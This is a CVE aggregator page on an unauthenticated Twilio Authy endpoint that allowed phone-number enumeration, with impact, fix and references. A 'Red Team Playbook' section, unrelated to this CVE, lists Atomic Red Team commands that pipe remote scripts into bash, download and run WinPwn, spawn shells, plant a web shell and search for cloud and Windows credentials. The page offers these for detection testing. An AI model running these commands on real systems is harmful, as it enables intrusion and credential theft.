CVE-2024-39891
Overview
This vulnerability is an information disclosure issue arising from an unauthenticated API endpoint within the Twilio Authy service. The root cause is the lack of authentication controls on an endpoint that processes streams of phone number queries. The affected components are the Authy Android application versions prior to 25.1.0 and Authy iOS versions prior to 26.1.0, specifically the API endpoint that verifies phone number registration status.
Vulnerability Description
In the Twilio Authy API, accessed by Authy Android before 25.1.0 and Authy iOS before 26.1.0, an unauthenticated endpoint provided access to certain phone-number data, as exploited in the wild in June 2024. Specifically, the endpoint accepted a stream of requests containing phone numbers, and responded with information about whether each phone number was registered with Authy. (Authy accounts were not compromised, however.)
Impact
An attacker can enumerate phone numbers registered with the Authy service without authentication or user interaction by querying the vulnerable endpoint. This enables targeted reconnaissance of users relying on Authy for two-factor authentication, potentially facilitating social engineering or account takeover attempts elsewhere. While direct compromise of Authy accounts is not possible through this vulnerability, the exposure of registration status data can aid attackers in identifying valid targets for further attacks.
Solution
Twilio recommends upgrading affected Authy applications to versions 25.1.0 or later for Android and 26.1.0 or later for iOS, which remove the unauthenticated access to the phone number registration endpoint. Detailed patch instructions and security updates are documented in Twilio’s changelog and security vulnerability reporting pages at https://www.twilio.com/en-us/changelog and https://www.twilio.com/docs/usage/security/reporting-vulnerabilities. No additional workarounds are specified beyond applying these version updates.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability within the Twilio Authy API stems from an unauthenticated endpoint that inadvertently exposes sensitive information regarding phone-number registrations. This flaw affects the Authy mobile applications on both Android and iOS platforms prior to specified versions. The endpoint allows attackers to submit a series of requests containing phone numbers and receive responses indicating whether each number is registered with the Authy service. While the vulnerability does not compromise user accounts directly, it enables attackers to gather intelligence on which phone numbers are linked to Authy accounts, potentially facilitating further attacks or social engineering tactics.
Exploitation of this vulnerability can occur through various attack vectors. An adversary could automate the process of sending requests to the endpoint, systematically probing a list of phone numbers to identify which ones are registered with Authy. This could be executed in a relatively straightforward manner, requiring minimal technical expertise. Once an attacker identifies registered numbers, they could leverage this information to conduct targeted phishing attacks, SIM swapping, or other forms of identity theft. The ability to ascertain which phone numbers are associated with the Authy service provides a foothold for attackers to exploit the trust users place in two-factor authentication mechanisms.
The real-world impact of this vulnerability is significant, particularly for businesses relying on the Authy service for securing user accounts. Although the vulnerability does not lead to direct account compromise, the exposure of phone-number registration status can undermine user trust and confidence in the security of the service. Organizations that utilize Authy for two-factor authentication may face reputational damage, loss of customer trust, and potential regulatory scrutiny, especially if the exposed data leads to successful attacks against users. The risk extends beyond individual users, as attackers could leverage the information to target organizations with social engineering attacks, potentially leading to data breaches or financial losses.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is crucial to monitor API access logs for unusual patterns of requests, such as a high volume of queries from a single IP address or requests containing sequential phone numbers. This can help identify potential exploitation attempts. Additionally, organizations should enforce rate limiting on API endpoints to prevent automated attacks and reduce the likelihood of mass probing. It is also advisable to implement authentication and authorization checks on all API endpoints, ensuring that sensitive information is only accessible to authenticated users with appropriate permissions.
In conclusion, the vulnerability within the Twilio Authy API highlights the importance of securing API endpoints against unauthorized access and information disclosure. Organizations must remain vigilant in monitoring their systems for potential exploitation and take proactive measures to safeguard user data. By understanding the implications of such vulnerabilities and implementing robust detection and mitigation strategies, businesses can better protect themselves and their users from the evolving landscape of cyber threats.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Twilio | Authy | All |
cpe:2.3:a:twilio:authy:*:*:*:*:*:iphone_os:*:*
|
|
|
Twilio | Authy Authenticator | All |
cpe:2.3:a:twilio:authy_authenticator:*:*:*:*:*:android:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-189 | Black Box Reverse Engineering |
30%
|
— | Low |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-39891 |
| cwe.mitre.org |
GitHub CVE
|
https://cwe.mitre.org/data/definitions/203.html |
| twilio.com |
GitHub CVE
|
https://www.twilio.com/docs/usage/security/reporting-vulnerabilities |
| twilio.com |
GitHub CVE
|
https://www.twilio.com/en-us/changelog |
| bleepingcomputer.com |
GitHub CVE
|
https://www.bleepingcomputer.com/news/security/hackers-abused-api-to-verify-millions-of-authy-mfa-phone-numbers/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-39891 |